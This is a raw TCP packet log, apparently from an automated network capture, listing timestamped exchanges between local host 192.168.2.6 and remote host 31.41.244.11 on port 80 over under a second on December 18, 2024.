                                                                                                                                                              Dec 18, 2024 11:47:19.795397997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.796540976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.796583891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.796953917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.798042059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.798086882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.798171997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.798212051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.798856974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.798868895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.798897028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.798953056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.800092936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.800192118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.800236940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.801225901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.801388025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.801428080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.802519083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.802594900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.802638054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.803621054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.803664923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.804071903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.804797888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.804809093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.804858923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.805896997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.805958033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.806206942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.807123899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.807137966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.807174921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.807209969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.808178902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.808383942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.808433056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.809329033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.809941053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.809984922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.810745001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.810758114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.810801029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.811671019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.811712027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.812448025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.812958002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.812999964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.813026905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.814050913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.814090967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.814362049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.814574957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.815253973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.816267014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.816360950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.816394091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.816405058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.816441059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.817684889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.817730904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.817738056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.817838907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.818767071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.819363117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.819411039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.819818020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.820225000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.820272923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.821101904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.821144104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.821176052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.822057009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.822241068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.822278023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.823406935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.823419094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.823447943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.823463917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.823465109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.824418068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.824570894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.824610949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.824836969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.824876070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.825702906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.825741053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.825790882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.825828075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.826967955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.826984882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.827011108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.827028036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.828099966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.828260899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.828315973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.829196930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.829622984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.829677105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.830388069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.830430984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.830914974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.831576109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.831619978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.831790924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.832278967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.832884073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.832895994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.832933903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.833894968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.834686995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.834743977 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.834809065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.835258961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.835272074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.835321903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.836266041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.836738110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.836786985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.837440968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.837482929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.837527990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.838574886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.838622093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.839608908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.839775085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.839787006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.839821100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.839838028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.841121912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.841135979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.841191053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.842076063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.842112064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.842127085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.842638016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.843301058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.843319893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.843346119 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.843370914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.844377041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.844683886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.844723940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.845627069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.845717907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.845757961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.846788883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.846823931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.847285032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.847848892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.847891092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.977612019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.977669001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.978249073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.978265047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.978317022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.978490114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.978530884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.979456902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.979491949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.979500055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.979526043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.980552912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.980604887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.980757952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.980804920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.981890917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.981929064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.982084990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.982125044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.982973099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.983040094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.983071089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.983108997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.984107971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.984153986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.984421968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.984462023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.985337973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.985390902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.985666990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.985708952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.986443043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.986496925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.986593962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.986634016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.987759113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.987802982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.988471985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.988511086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.988825083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.988862991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.988886118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.988924980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.989909887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.989953041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.990334034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.990375042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.991084099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.991137028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.991228104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.991275072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.992259979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.992330074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.993170977 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.993206024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.993423939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.993467093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.993499041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.993539095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.994574070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.994617939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.994689941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.994730949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.995767117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.995810032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.995973110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.996017933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.996915102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.996956110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.997100115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.997143984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.998107910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.998120070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.998150110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.998166084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.999258995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.999305010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.999461889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.999509096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.000601053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.000647068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.001120090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.001163960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.001588106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.001631021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.001966953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.002011061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.002774000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.002820969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.002854109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.002892971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.005121946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.005134106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.005145073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.005207062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.005207062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.005412102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.005454063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.006306887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.006366014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.006824017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.006877899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.007462025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.007549047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.008208990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.008268118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.008764982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.008778095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.008824110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.008840084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.009825945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.009840012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.009870052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.009887934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.011107922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.011118889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.011147022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.011162996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.012335062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.012348890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.012384892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.013653040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.013694048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.013792992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.013834953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.014708042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.014719963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.014750957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.014765978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.015618086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.015659094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.015894890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.015934944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.016855001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.016866922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.016897917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.018019915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.018063068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.018201113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.018241882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.019725084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.019747019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.019771099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.019782066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.020387888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.020430088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.020669937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.020711899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.021481037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.021524906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.021729946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.021766901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.023046017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.023056984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.023091078 CET4980680192.168.2.631.41.244.11
